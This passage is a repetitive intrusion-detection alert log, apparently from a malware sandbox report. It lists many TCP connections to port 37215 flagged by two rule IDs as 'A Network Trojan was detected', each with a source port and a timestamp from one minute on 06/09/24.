          SID:2829579
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223294
          SID:2829579
          Source Port:47016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818585
          SID:2835222
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553823
          SID:2829579
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288585
          SID:2829579
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870649
          SID:2829579
          Source Port:55346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104287
          SID:2835222
          Source Port:41780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292676
          SID:2835222
          Source Port:45572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719559
          SID:2829579
          Source Port:54404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552774
          SID:2829579
          Source Port:59602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100805
          SID:2829579
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719156
          SID:2835222
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645036
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004197
          SID:2835222
          Source Port:59124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945337
          SID:2835222
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288660
          SID:2829579
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077953
          SID:2829579
          Source Port:39488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082319
          SID:2829579
          Source Port:42616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916854
          SID:2835222
          Source Port:34330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041895
          SID:2835222
          Source Port:40818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417496
          SID:2829579
          Source Port:59524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247293
          SID:2829579
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225818
          SID:2835222
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2829579
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289059
          SID:2829579
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991347
          SID:2835222
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601059
          SID:2835222
          Source Port:36728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921071
          SID:2835222
          Source Port:49558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067391
          SID:2835222
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537862
          SID:2835222
          Source Port:35918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892569
          SID:2829579
          Source Port:35742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988943
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080762
          SID:2829579
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644320
          SID:2835222
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821261
          SID:2835222
          Source Port:58126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820046
          SID:2835222
          Source Port:46536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250651
          SID:2829579
          Source Port:43922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539978
          SID:2835222
          Source Port:52524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288585
          SID:2835222
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034038
          SID:2835222
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159521
          SID:2829579
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225031
          SID:2835222
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166536
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076396
          SID:2829579
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080843
          SID:2829579
          Source Port:58662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598242
          SID:2829579
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598151
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.645102
          SID:2835222
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651493
          SID:2835222
          Source Port:40288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642901
          SID:2829579
          Source Port:46546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870574
          SID:2829579
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.038580
          SID:2835222
          Source Port:40996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395893
          SID:2835222
          Source Port:49232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167028
          SID:2829579
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.560013
          SID:2829579
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299286
          SID:2835222
          Source Port:39190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537939
          SID:2829579
          Source Port:34550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167616
          SID:2835222
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719015
          SID:2829579
          Source Port:34670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720328
          SID:2829579
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822494
          SID:2835222
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644434
          SID:2835222
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078269
          SID:2829579
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988988
          SID:2835222
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602439
          SID:2829579
          Source Port:59630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945375
          SID:2835222
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224996
          SID:2829579
          Source Port:44828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041368
          SID:2829579
          Source Port:49386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644903
          SID:2829579
          Source Port:59862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469389
          SID:2835222
          Source Port:41882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563517
          SID:2829579
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168798
          SID:2835222
          Source Port:51116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820744
          SID:2829579
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563457
          SID:2835222
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863705
          SID:2835222
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468712
          SID:2835222
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102163
          SID:2829579
          Source Port:37504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905566
          SID:2835222
          Source Port:35278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645954
          SID:2835222
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297585
          SID:2829579
          Source Port:60026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073949
          SID:2829579
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865182
          SID:2829579
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163119
          SID:2829579
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712937
          SID:2829579
          Source Port:33432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716098
          SID:2829579
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.279012
          SID:2829579
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165484
          SID:2829579
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562271
          SID:2829579
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476821
          SID:2835222
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079236
          SID:2835222
          Source Port:34704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930143
          SID:2835222
          Source Port:59572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605992
          SID:2829579
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561747
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692986
          SID:2829579
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036204
          SID:2835222
          Source Port:57304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597298
          SID:2829579
          Source Port:54218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692063
          SID:2829579
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275535
          SID:2829579
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085519
          SID:2829579
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080686
          SID:2835222
          Source Port:52822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244911
          SID:2835222
          Source Port:55010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230564
          SID:2829579
          Source Port:59990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894625
          SID:2829579
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863232
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398369
          SID:2835222
          Source Port:36984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687359
          SID:2835222
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398620
          SID:2835222
          Source Port:45426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592656
          SID:2829579
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929371
          SID:2829579
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904654
          SID:2829579
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288909
          SID:2835222
          Source Port:60994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567605
          SID:2835222
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133717
          SID:2829579
          Source Port:40560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923088
          SID:2835222
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396178
          SID:2835222
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993467
          SID:2835222
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164254
          SID:2835222
          Source Port:35234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859247
          SID:2835222
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034708
          SID:2835222
          Source Port:34410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289414
          SID:2835222
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928712
          SID:2835222
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285621
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163923
          SID:2835222
          Source Port:37256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034650
          SID:2829579
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467124
          SID:2829579
          Source Port:47812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693869
          SID:2829579
          Source Port:42568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914702
          SID:2829579
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821663
          SID:2835222
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247635
          SID:2829579
          Source Port:36900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399807
          SID:2835222
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715539
          SID:2835222
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166862
          SID:2835222
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272022
          SID:2835222
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287838
          SID:2829579
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538596
          SID:2835222
          Source Port:42518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2835222
          Source Port:47790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272354
          SID:2829579
          Source Port:57990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561771
          SID:2835222
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251265
          SID:2835222
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991534
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464751
          SID:2829579
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918192
          SID:2835222
          Source Port:51054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227353
          SID:2835222
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890618
          SID:2835222
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918022
          SID:2829579
          Source Port:57414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120636
          SID:2829579
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034951
          SID:2829579
          Source Port:50470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082907
          SID:2835222
          Source Port:50212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715428
          SID:2829579
          Source Port:48938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419520
          SID:2835222
          Source Port:46212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539890
          SID:2835222
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164741
          SID:2829579
          Source Port:57686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163196
          SID:2829579
          Source Port:39964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929328
          SID:2829579
          Source Port:35466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414304
          SID:2829579
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399695
          SID:2835222
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398723
          SID:2829579
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696430
          SID:2829579
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008083
          SID:2835222
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557654
          SID:2829579
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632964
          SID:2835222
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169738
          SID:2835222
          Source Port:54324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165337
          SID:2829579
          Source Port:39052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105276
          SID:2829579
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921028
          SID:2829579
          Source Port:56830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925255
          SID:2835222
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289982
          SID:2835222
          Source Port:59322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.123314
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861295
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948938
          SID:2835222
          Source Port:39916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647741
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469480
          SID:2835222
          Source Port:53042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168593
          SID:2829579
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720659
          SID:2829579
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720630
          SID:2829579
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035126
          SID:2835222
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396688
          SID:2829579
          Source Port:40726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248818
          SID:2835222
          Source Port:38552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466097
          SID:2829579
          Source Port:33670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608002
          SID:2829579
          Source Port:47956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249576
          SID:2829579
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923179
          SID:2829579
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396656
          SID:2829579
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821842
          SID:2835222
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104299
          SID:2829579
          Source Port:48664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643217
          SID:2829579
          Source Port:34936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2829579
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241757
          SID:2829579
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038823
          SID:2835222
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473395
          SID:2835222
          Source Port:46098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287131
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719354
          SID:2835222
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565084
          SID:2835222
          Source Port:47262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668805
          SID:2835222
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600492
          SID:2835222
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949861
          SID:2829579
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822004
          SID:2835222
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595575
          SID:2835222
          Source Port:48046
          Destination Port:37215
